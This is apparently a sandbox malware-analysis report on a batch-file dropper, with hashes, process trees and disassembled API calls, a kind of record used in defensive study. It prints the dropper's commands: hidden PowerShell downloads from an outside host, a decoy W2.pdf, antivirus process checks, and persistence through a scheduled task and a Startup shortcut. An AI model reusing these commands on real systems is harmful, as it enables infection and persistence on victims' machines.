SHA-512:	FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574
Malicious:	false
Preview:	0...0.....0....H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G4..240806194648Z..240827194648Z.00.0...U.#..0.......q]dL..g?....O0...U........0....H.............vz..@.Nm...6d...t;.Jx?....6...p...#.[.......o.q...;.........?......o...^p0R.......~....)....i.n;A.n.z..O~..%=..s..W.4.+........G...*..=....xen$_i"s..\...L..4../<.4...G.....L...c..k@.J.rC.4h.c.ck./.Q-r53..a#.8#......0.n......a.-'..S. .>..xAKo.k.....;.D>....sb '<..-o.KE...X!i.].c.....o~.q........D...`....N... W:{.3......a@....i....#./..eQ...e.......W.s..V:.38..U.H{.>.....#....?{.....bYAk'b0on..Gb..-..).."q2GO<S.C...FsY!D....x..]4.....X....Y...Rj.....I.96$.4ZQ&..$,hC..H.%..hE....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js" >), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	101
Entropy (8bit):	4.871303939038379
Encrypted:	false
SSDEEP:	3:HRAbABGQaFyw3pYoqLTVSRE2J5okZYaLi2eOL9PWHq:HRYF5yjoqLTwi23oqLXL9Iq
MD5:	4D8878C8F97369C07F2F589950C73CC3
SHA1:	3F4C594B7DF39E32C0865D7BCC2F3CFCAA03698D
SHA-256:	FB31F2D5DCD04BEBD7270C787B13CD153056F8BE303A9273E8CF8BAC9DE7C692
SHA-512:	79B6425888FF860ED7D063B8C59BB0901EECA39D5E8E28B6AE7597BE34A34EC76EEE9320E5F38D847B17D9F29BAAE8AE5D236FA518BFC3D4FC2CC5B2D3ACC8A3
Malicious:	true
Preview:	[InternetShortcut] ..URL="C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js" ..

C:\Users\user\Downloads\W2.pdf

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PDF document, version 1.4, 1 pages
Category:	dropped
Size (bytes):	393964
Entropy (8bit):	7.894863553506209
Encrypted:	false
SSDEEP:	6144:fz/0MaxA4h4379ErMr1NPe8ThAvXG4e5c8m1TCso1/kWS7uu:fz/0MaqxKy1NkvXG4MpmNokF
MD5:	57F09EA46C7039EA45BB3FD01BBD8C80
SHA1:	1365FF5E6E6EFC3E501D350711672F6A232AA9F8
SHA-256:	3850E8022E3990B709DA7CDDBFD3F830EB86F34AF89D5939E2999C1E7DE9766F
SHA-512:	6DE0ACD9D03BDE584A7B2C2C7781530BA7504622B518523993311AD6174D2A9890E9D230A2A3A51D76615111A9F62259A9615378440690F20708B201B19A17F8
Malicious:	true
Preview:	%PDF-1.4.%......4 0 obj.<</Linearized 1/L 393964/O 6/E 362617/N 1/T 393770/H [ 1316 238]>>.endobj. .xref..4 51..0000000016 00000 n..0000001554 00000 n..0000001614 00000 n..0000002242 00000 n..0000002407 00000 n..0000002915 00000 n..0000003346 00000 n..0000003757 00000 n..0000003803 00000 n..0000005034 00000 n..0000006941 00000 n..0000008869 00000 n..0000010482 00000 n..0000011608 00000 n..0000012618 00000 n..0000012731 00000 n..0000013728 00000 n..0000014512 00000 n..0000014563 00000 n..0000014676 00000 n..0000014801 00000 n..0000029764 00000 n..0000030031 00000 n..0000058294 00000 n..0000058547 00000 n..0000085116 00000 n..0000085374 00000 n..0000094559 00000 n..0000094824 00000 n..0000094951 00000 n..0000095014 00000 n..0000095044 00000 n..0000095120 00000 n..0000113594 00000 n..0000113891 00000 n..0000113954 00000 n..0000114069 00000 n..0000132543 00000 n..0000191838 00000 n..0000192135 00000 n..0000192913 00000 n..0000193209 00000 n..0000196912 00000 n..0000197906 0

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Static File Info

General

File type:	DOS batch file, ASCII text, with CRLF line terminators
Entropy (8bit):	5.198499125177484
TrID:
File name:	9W9jJCj9EV.bat
File size:	498 bytes
MD5:	e8dfdb915a523a09e139aaa900991ddd
SHA1:	d23f4798c549bfb7ddd968c4c2a971f67468a662
SHA256:	91619737b3f7af4623dc62b4f3df7b551337ec94f693a3b9ba35bb231483393e
SHA512:	b4e737d1c80420688bf856df02a580b691d120307b7d31ea4766448ccd0c6eec7b2c48424691e92dffba58ca8c9a8df989f5b683d9363cac37d3dd3e5ad1623e
SSDEEP:	12:wmDU081kkGrAOtD0OO081kkGVX5OQ981kvYX53RP:wmD7RrAO90OxRxUkvYX53RP
TLSH:	C8F059370112340A8F1AC425900473807513B947C94AB4A301FE8C742DC3063CBE6EDB
File Content Preview:	@echo off..set url=https://myguyapp.com/msword.zip..set url2=https://myguyapp.com/W2.pdf..powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri %url2% -OutFile %USERPROFILE%\Downloads\W2.pdf"..cd %USERPROFILE%\Downloads..start W2.pdf..powershell

File Icon


Icon Hash:	9686878b929a9886

Target ID:	0
Start time:	02:56:03
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\9W9jJCj9EV.bat" "
Imagebase:	0x7ff6ee4d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	02:56:03
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:56:03
Start date:	05/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:56:08
Start date:	05/01/2025
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"
Imagebase:	0x7ff6153b0000
File size:	5'641'176 bytes
MD5 hash:	24EAD1C46A47022347DC0F05F6EFBB8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	02:56:08
Start date:	05/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:56:09
Start date:	05/01/2025
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Imagebase:	0x7ff61f300000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	02:56:09
Start date:	05/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff77afe0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	02:56:09
Start date:	05/01/2025
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2116 --field-trial-handle=1716,i,17469338737042705526,11542992222865520441,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Imagebase:	0x7ff61f300000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	02:56:22
Start date:	05/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DesusertionPath C:\Users\user\AppData\Local\Temp\msword -Force"
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	02:56:42
Start date:	05/01/2025
Path:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
Wow64 process (32bit):	true
Commandline:	msword.exe
Imagebase:	0x400000
File size:	524'295'939 bytes
MD5 hash:	6BCF42715FD1768FE1013C702612D0EE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	02:56:43
Start date:	05/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c copy Market Market.cmd && Market.cmd
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	02:56:43
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	02:56:45
Start date:	05/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xc40000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	02:56:45
Start date:	05/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa opssvc"
Imagebase:	0x20000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	02:56:47
Start date:	05/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xc40000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	02:56:47
Start date:	05/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0x20000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	02:56:47
Start date:	05/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 677826
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	02:56:47
Start date:	05/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "MechanicalDlModularRuSchedulingVisibilityProposalsClimb" Hearings
Imagebase:	0x20000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	02:56:47
Start date:	05/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Charged + ..\Syndicate + ..\Controversy + ..\Fig + ..\Phentermine + ..\Peripheral + ..\Lets + ..\Usgs + ..\Viewed + ..\Dealer + ..\Matter N
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	02:56:47
Start date:	05/01/2025
Path:	C:\Users\user\AppData\Local\Temp\677826\Prostores.com
Wow64 process (32bit):	true
Commandline:	Prostores.com N
Imagebase:	0x480000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	26
Start time:	02:56:48
Start date:	05/01/2025
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0x6e0000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	02:56:48
Start date:	05/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	02:56:48
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	02:56:48
Start date:	05/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F
Imagebase:	0x960000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	02:56:48
Start date:	05/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url" & echo URL="C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url" & exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	02:56:48
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	02:56:49
Start date:	05/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js"
Imagebase:	0x7ff674960000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	02:56:49
Start date:	05/01/2025
Path:	C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\s"
Imagebase:	0xb40000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	02:57:01
Start date:	05/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js"
Imagebase:	0x7ff674960000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	02:57:01
Start date:	05/01/2025
Path:	C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\s"
Imagebase:	0xb40000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	17.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21%
Total number of Nodes:	1482
Total number of Limit Nodes:	28

Executed Functions

Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040515B
GetDlgItem.USER32(?,000003EE), ref: 0040516A
GetClientRect.USER32(?,?), ref: 004051C2
GetSystemMetrics.USER32(00000015), ref: 004051CA
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
ShowWindow.USER32(?,00000008), ref: 00405266
GetDlgItem.USER32(?,000003EC), ref: 00405287
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
GetDlgItem.USER32(?,000003F8), ref: 00405179

Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004283D1,76F923A0,00000000), ref: 00406902

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

GetDlgItem.USER32(?,000003EC), ref: 004052D7
CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
CloseHandle.KERNELBASE(00000000), ref: 004052EC
ShowWindow.USER32(00000000), ref: 00405313
ShowWindow.USER32(?,00000008), ref: 00405318
ShowWindow.USER32(00000008), ref: 0040535F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
CreatePopupMenu.USER32 ref: 004053A2
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
GetWindowRect.USER32(?,?), ref: 004053CA
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
OpenClipboard.USER32(00000000), ref: 00405437
EmptyClipboard.USER32 ref: 0040543D
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
GlobalLock.KERNEL32(00000000), ref: 00405453
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
GlobalUnlock.KERNEL32(00000000), ref: 00405489
SetClipboardData.USER32(0000000D,00000000), ref: 00405494
CloseClipboard.USER32 ref: 0040549A

Strings

New install of "%s" to "%s", xrefs: 004051AE
{, xrefs: 0040537E

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: New install of "%s" to "%s"${
API String ID: 2110491804-1641061399
Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038CE
SetErrorMode.KERNELBASE(00008001), ref: 004038D9
OleInitialize.OLE32(00000000), ref: 004038E0

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
CoUninitialize.COMBASE(?), ref: 00403AFD
ExitProcess.KERNEL32 ref: 00403B1D
lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C

Strings

NCRC, xrefs: 004039A8
NSIS Error, xrefs: 0040390E
Error launching installer, xrefs: 00403AA9
~nsu.tmp, xrefs: 00403B23
_?=, xrefs: 00403A90
\Temp, xrefs: 00403A47
SeShutdownPrivilege, xrefs: 00403C42
/D=, xrefs: 004039D2

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
